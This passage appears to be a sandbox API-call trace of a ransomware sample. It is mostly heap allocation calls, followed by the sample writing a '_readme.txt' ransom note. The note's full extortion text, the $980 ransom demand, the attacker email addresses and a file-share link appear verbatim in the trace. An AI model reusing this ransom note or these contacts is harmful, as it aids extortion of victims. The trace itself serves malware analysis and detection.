0x328eec8 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.306] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.312] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0056.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.312] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.312] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.312] PathFindFileNameW (pszPath="") returned="" [0056.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.312] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.312] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.312] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.312] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.312] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0056.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.312] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0056.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.313] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.313] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase 